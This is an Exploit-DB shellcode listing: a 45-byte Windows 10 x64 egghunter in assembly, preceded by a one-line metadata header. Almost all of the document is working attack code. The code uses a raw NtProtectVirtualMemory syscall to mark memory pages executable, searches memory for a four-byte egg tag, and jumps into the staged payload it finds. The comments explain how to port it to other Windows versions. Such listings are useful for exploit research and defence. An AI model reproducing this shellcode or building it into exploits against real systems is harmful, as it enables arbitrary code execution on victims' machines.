EDB-ID: 41827 | Author: Peter Baris | Published: 2017-04-06 | CVE: N/A | Type: Shellcode | Platform: Win_x86-64 | Shellcode: Download / View Raw | Shellcode Size: 45 bytes |
.code
Win10egghunterx64 PROC
_start:
push 7fh
pop rdi ; RDI is nonvolatile, so it will be preserved after syscalls
_setup:
inc rdi ; parameter 1 - lpAddress - counter
mov r9b,40h ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE
pop rsi ; Stack alignment before the stack setup
pop rsi
push rdi
push rsp
pop rdx ; pointer to lpAddress
push 08h ; parameter 2 - dwSize 0x8
push rsp
pop r8 ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp
mov [rdx+20h],rsp ; parameter 4 - lpflOldprotect
dec r10 ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error
_VirtualProtectEx:
push 50h ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family
pop rax
syscall
_rc_check:
cmp al,01h ; check the response for non-allocated memory
jge _setup
_end: ; There won't be too many of these eggs in the memory
mov eax, 042303042h ; the egg
scasd
jnz _setup
jmp rdi
Win10egghunterx64 ENDP
END